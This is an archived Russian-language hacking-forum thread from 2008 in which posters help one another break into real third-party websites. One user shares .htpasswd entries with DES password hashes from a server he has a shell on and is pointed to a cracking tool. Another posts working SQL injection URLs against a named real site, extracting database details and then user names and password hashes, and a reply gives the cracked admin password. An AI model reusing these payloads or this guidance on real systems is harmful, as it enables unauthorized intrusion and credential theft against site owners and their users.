ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
04.03.2008, 01:30
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
путь относительно корня (прлный). Если тебе нужно прочитать скрипт, то ищи раскрытие путей через выведенные ошибки или подбором (на практике, никогда не получалось)
|
|
|
04.03.2008, 04:01
|
|
Новичок
Регистрация: 24.01.2008
Сообщений: 20
Провел на форуме:
39650
Репутация:
15
|
|
Хотел узнать есть шелл на нем я нашел файлик .htpasswd открыл его там имеет запись виде:
sysun:H6I2zWbdQB7FU
pisty:34S0knJ4Gb362
Я так понял это акки, но для чего??? И в каком виде зашифрованы пароли??? |
|
|
|
04.03.2008, 04:06
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
посмотри рядом лежащие htaccess'ы, в них разгадка. пассы в DES'e
__________________
|
|
|
|
04.03.2008, 04:30
|
|
Новичок
Регистрация: 24.01.2008
Сообщений: 20
Провел на форуме:
39650
Репутация:
15
|
|
+toxa+ огромное спасибо ты был прав в файле htacces был урл =). Теперь нужно рассшифровать пассы)
|
|
|
|
04.03.2008, 05:26
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
passwordspro тебе в помощь)
__________________
|
|
|
|
04.03.2008, 15:55
|
|
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782
Репутация:
81
|
|
Вот обьясните мне, ну вот нашел я уязвимость в скрипте вот
http://www.build.kz/index.php?page=inc/cut§or=comp&action=sublist&cid=-1+union+select+concat(user(),char(58),version(),ch ar(58),database()),2+/*
А как мне имена таблиц то и столбцов подобрать??? версия скулы то 4 чем пользоваться? или есть базы? поделитесь пжлст)))
|
|
|
|
04.03.2008, 16:09
|
|
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217
Репутация:
2097
|
|
Вот тут список дефолтовских таблиц и полей:
http://forum.antichat.ru/showpost.php?p=465677&postcount=3
подбирай
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
Последний раз редактировалось l-l00K; 04.03.2008 в 16:13..
|
|
|
|
04.03.2008, 16:12
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
2 truelamer
Ручками, то есть - ручной брутфорс, а вообще - там есть табла users - тебе осталось только колонки подобрать
|
|
|
|
04.03.2008, 16:27
|
|
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782
Репутация:
81
|
|
Спасибо
вот что я нашел
http://www.build.kz/index.php?page=inc/cut§or=comp&action=sublist&cid=-1+union+select+concat(users_name,char(58),users_pa ssword),2+from+users%20limit+0,1/*
только проблема обьясните там что хэш пароля не до конца вылез или как? и почему то лимитом листать не получается что только один пользователь?
|
|
|
|
04.03.2008, 16:33
|
|
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217
Репутация:
2097
|
|
Там один пользователь, это MySQL хэш, расшифровывается как admin
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
